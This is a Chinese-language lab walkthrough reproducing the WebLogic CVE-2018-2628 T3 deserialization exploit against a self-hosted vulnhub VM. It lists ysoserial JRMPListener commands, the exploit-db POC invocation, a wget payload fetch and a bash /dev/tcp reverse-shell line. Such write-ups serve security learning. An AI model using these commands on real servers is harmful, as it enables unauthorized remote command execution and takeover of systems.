鄭重聲明:所用漏洞環(huán)境為自建虛擬機(jī)vulnhub靶機(jī)環(huán)境,僅供本人學(xué)習(xí)使用。
漏洞簡(jiǎn)述
Oracle 2018年4月補(bǔ)丁中,修復(fù)了Weblogic Server WLS Core Components中出現(xiàn)的一個(gè)反序列化漏洞(CVE-2018-2628),該漏洞通過(guò)t3協(xié)議觸發(fā),可導(dǎo)致未授權(quán)的用戶在遠(yuǎn)程服務(wù)器執(zhí)行任意命令。
影響版本:10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3
準(zhǔn)備環(huán)境
測(cè)試機(jī)IP:192.168.79.129
靶機(jī)IP:192.168.79.131
1. 啟動(dòng)Vulnhub靶機(jī)環(huán)境:

2. 驗(yàn)證靶機(jī)應(yīng)用啟用成功:

3. 通過(guò)nmap掃描確認(rèn)Weblogic版本

漏洞復(fù)現(xiàn)
POC 引用:https://www.exploit-db.com/exploits/44553
1. 準(zhǔn)備 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
2. 準(zhǔn)備反彈Shell文件shell.sh
bash -i >& /dev/tcp/192.168.79.129/4444 0>&1
3. 啟JRMPListener和執(zhí)行的命令
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'wget 192.168.79.129/shell.sh'

4.啟http server

5. 執(zhí)行POC腳本
python exploit.py 192.168.79.131 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.79.129 1099 JRMPClient

靶機(jī)已下載了反彈Shell文件


6. 使用NC偵聽(tīng)反彈端口

7. 重復(fù)之前的步驟
a. 準(zhǔn)備JRMPListener和執(zhí)行的命令,來(lái)執(zhí)行反彈Shell文件
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'bash shell.sh'

b. 執(zhí)行POC腳本

得到反彈Shell

關(guān)閉環(huán)境
